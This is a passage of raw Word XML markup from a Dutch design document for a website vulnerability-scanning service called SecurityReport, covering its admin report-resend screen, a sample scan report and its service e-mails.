                    <w:p w14:paraId="26678F8B" w14:textId="2152B2D4" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.11</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4A6C62" w14:textId="12D8B598" w:rsidR="004D0768" w:rsidRDefault="00DC7ADA" w:rsidP="004D0768">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253073408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EBB4DE8" wp14:editId="190D5E3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3213100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5774690" cy="916940"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42" name="Text Box 42"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5774690" cy="9169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39E9759" w14:textId="15AD5FC2" w:rsidR="002A05E5" w:rsidRPr="007C19DC" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>De status kolom is bedoeld om te zien of het rapport succesvol is verzonden, wanneer dit niet het geval is kan de administrator het rapport nogmaals verzenden door op de knop “verzenden” te drukken. Er verschijnt dan een pop-up venster om deze actie te bevestigingen. Druk de administrator op “Verzend rapport” dan wordt het rapport verzonden. “Annuleer” om het proces af te br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4DE8" id="Text Box 42" o:spid="_x0000_s1215" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:253pt;width:454.7pt;height:72.2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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="639E9759" w14:textId="15AD5FC2" w:rsidR="002A05E5" w:rsidRPr="007C19DC" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>De status kolom is bedoeld om te zien of het rapport succesvol is verzonden, wanneer dit niet het geval is kan de administrator het rapport nogmaals verzenden door op de knop “verzenden” te drukken. Er verschijnt dan een pop-up venster om deze actie te bevestigingen. Druk de administrator op “Verzend rapport” dan wordt het rapport verzonden. “Annuleer” om het proces af te breken.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00952F29">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253072384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FE47095" wp14:editId="3D7F1688">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3018790"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="29210"/>
            <wp:wrapSquare wrapText="bothSides"/>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verzend rapport.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301879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152CDB53" w14:textId="77777777" w:rsidR="004D0768" w:rsidRDefault="004D0768" w:rsidP="004D0768"/>
    <w:p w14:paraId="0B3F103D" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="008720A4" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E457C9" w14:textId="5038B6C4" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253079552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="064C2ABA" wp14:editId="393E9A9F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900604</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-713670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="232" name="Rectangle 2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BCCE5" id="Rectangle 232" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-56.15pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="47086B8C" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0329BF3A" w14:textId="54A16F53" w:rsidR="00256686" w:rsidRDefault="00614F53" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253084672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EC97B5B" wp14:editId="2AC86175">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>347980</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5778500" cy="1145540"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="751" name="Text Box 751"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5778500" cy="11455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F413C4C" w14:textId="6D392493" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Na het dat SecurityReport het Crawl en Scan proces heeft afgerond wordt er gebaseerd op de verzamelde data een rapport gegenereerd. Met dit rapport heeft de gebruiker een overzichtelijk document dat laat zien in welke staat de website verkeerd. In dit voorbeeld heeft de website van Gert een dreigingsniveau van 3 (oranje) en er zijn 168 lage en gemiddelde kwetsbaarheden gevonden. Dit betreft een Quick Scan, wat enkel op misconfiguraties scant. Gert wordt geadviseerd om de configuratie van de server en cliënt te verbe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97B5B" id="Text Box 751" o:spid="_x0000_s1216" type="#_x0000_t202" style="position:absolute;margin-left:-2pt;margin-top:27.4pt;width:455pt;height:90.2pt;z-index:2530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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4F413C4C" w14:textId="6D392493" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Na het dat SecurityReport het Crawl en Scan proces heeft afgerond wordt er gebaseerd op de verzamelde data een rapport gegenereerd. Met dit rapport heeft de gebruiker een overzichtelijk document dat laat zien in welke staat de website verkeerd. In dit voorbeeld heeft de website van Gert een dreigingsniveau van 3 (oranje) en er zijn 168 lage en gemiddelde kwetsbaarheden gevonden. Dit betreft een Quick Scan, wat enkel op misconfiguraties scant. Gert wordt geadviseerd om de configuratie van de server en cliënt te verbeteren.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00557C84">
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r w:rsidR="008720A4">
        <w:t>Rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFC06F" w14:textId="77777777" w:rsidR="00C553AB" w:rsidRDefault="00C553AB" w:rsidP="00256686"/>
    <w:p w14:paraId="78A555B1" w14:textId="579FBF8E" w:rsidR="00B26A80" w:rsidRDefault="00F03C4F" w:rsidP="00256686">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253220864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26849031" wp14:editId="47C26F07">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5816600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6758305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="767080" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="814" name="Text Box 814"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="76708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6F049" w14:textId="0592CA99" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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49031" id="Text Box 814" o:spid="_x0000_s1217" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:458pt;margin-top:532.15pt;width:60.4pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7926F049" w14:textId="0592CA99" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.12</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B26A80">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253074432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0ADC7272" wp14:editId="4CC3C457">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>397510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="6603365"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="260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ort page 1.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660336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B26A80">
        <w:t>Pagina 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79566F6E" w14:textId="59BE4258" w:rsidR="00B26A80" w:rsidRDefault="00B26A80"/>
    <w:p w14:paraId="25B3C091" w14:textId="28913317" w:rsidR="00774007" w:rsidRDefault="0091607A">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253081600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A26EA9" wp14:editId="6561BCA4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-914587</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="248" name="Rectangle 2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636A5" id="Rectangle 248" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-71.95pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D687A" w14:textId="28D5CCB3" w:rsidR="00997F2E" w:rsidRDefault="00B26A80">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253075456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CC35892" wp14:editId="7722E39F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-25400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>342265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5652135" cy="4658995"/>
            <wp:effectExtent l="0" t="0" r="12065"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port page 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5652135" cy="4658995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Pagina 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFE8FD" w14:textId="2D1AC5CC" w:rsidR="00997F2E" w:rsidRDefault="00C91600">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253221888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18C4E45F" wp14:editId="73ED655C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-93980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4872990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="819" name="Text Box 819"/>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C46FC" w14:textId="3B43B78F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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4E45F" id="Text Box 819" o:spid="_x0000_s1218" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.4pt;margin-top:383.7pt;width:60pt;height:36pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5A1C46FC" w14:textId="3B43B78F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.13</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242547E" w14:textId="77777777" w:rsidR="00A6372D" w:rsidRDefault="00A6372D">
      <w:pPr>
        <w:sectPr w:rsidR="00A6372D" w:rsidSect="00512B06">
          <w:headerReference w:type="default" r:id="rId100"/>
          <w:headerReference w:type="first" r:id="rId101"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799FD4CC" w14:textId="47086494" w:rsidR="00A83B83" w:rsidRDefault="00A83B83">
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253083648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71D4419A" wp14:editId="34E90EC1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-915857</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="747" name="Rectangle 74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E01B0" id="Rectangle 747" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-72.05pt;width:25pt;height:1031.7pt;z-index:-2502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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE9051" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE7C4CC" w14:textId="4B4F4C26" w:rsidR="00A83B83" w:rsidRDefault="00557C84" w:rsidP="00557C84">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r w:rsidR="00A83B83">
        <w:t>E-mail Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578CB399" w14:textId="342F672B" w:rsidR="00E83033" w:rsidRDefault="005A6B3A" w:rsidP="00E83033">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253088768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1995A6E1" wp14:editId="57952AC3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="25400" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="755" name="Text Box 755"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="8026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568ED0D" w14:textId="3B898F0A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>In dit deel staan alle service e-mails weergeven. Er zijn drie type service e-mails, Registeren, Activatie en Rapport. De service e-mails worden verstuurd wanneer er een belangrijk event plaatsvindt waar de gebruiker op de hoogte van moet worden gehouden, zoals bij het registreren. Zie het Concept E-mail voor verdere uit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5A6E1" id="Text Box 755" o:spid="_x0000_s1219" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:22.1pt;width:460pt;height:63.2pt;z-index:2530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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1568ED0D" w14:textId="3B898F0A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>In dit deel staan alle service e-mails weergeven. Er zijn drie type service e-mails, Registeren, Activatie en Rapport. De service e-mails worden verstuurd wanneer er een belangrijk event plaatsvindt waar de gebruiker op de hoogte van moet worden gehouden, zoals bij het registreren. Zie het Concept E-mail voor verdere uitleg.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2E499" w14:textId="328A4FD8" w:rsidR="00E83033" w:rsidRPr="00E83033" w:rsidRDefault="00E83033" w:rsidP="00E83033"/>
    <w:p w14:paraId="5250F1B6" w14:textId="1C6F0B79" w:rsidR="00873418" w:rsidRDefault="009404C6" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B17E6F0" wp14:editId="26179C5A">
            <wp:extent cx="5731510" cy="2553970"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="3683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registratie e-mail.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2553970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F03C4F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253222912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EAD8ACB" wp14:editId="7E5C95FE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2745740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="820" name="Text Box 820"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1460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834E58" w14:textId="3926FFD6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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D8ACB" id="Text Box 820" o:spid="_x0000_s1220" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.05pt;margin-top:216.2pt;width:115pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4D834E58" w14:textId="3926FFD6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.14</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C09E8" w14:textId="03671EE0" w:rsidR="00873418" w:rsidRDefault="00F03C4F" w:rsidP="00EB3DC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253089792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="314A18B1" wp14:editId="1C47B908">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-20320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>434340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5656580" cy="3342005"/>
            <wp:effectExtent l="25400" t="25400" r="33020" b="36195"/>
            <wp:wrapSquare wrapText="bothSides"/>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remium e-mail.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5656580" cy="334200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7AC1B8A7" w14:textId="0D27BC98" w:rsidR="008B11A9" w:rsidRDefault="00F03C4F" w:rsidP="00A83B83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253223936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FD52BFE" wp14:editId="647435A9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3559810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="821" name="Text Box 821"/>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F304C" w14:textId="174645FB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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52BFE" id="Text Box 821" o:spid="_x0000_s1221" type="#_x0000_t202" style="position:absolute;margin-left:-1.95pt;margin-top:280.3pt;width:105pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="052F304C" w14:textId="174645FB" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.15</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D52F81" w14:textId="77777777" w:rsidR="008B11A9" w:rsidRDefault="008B11A9">
      <w:pPr>
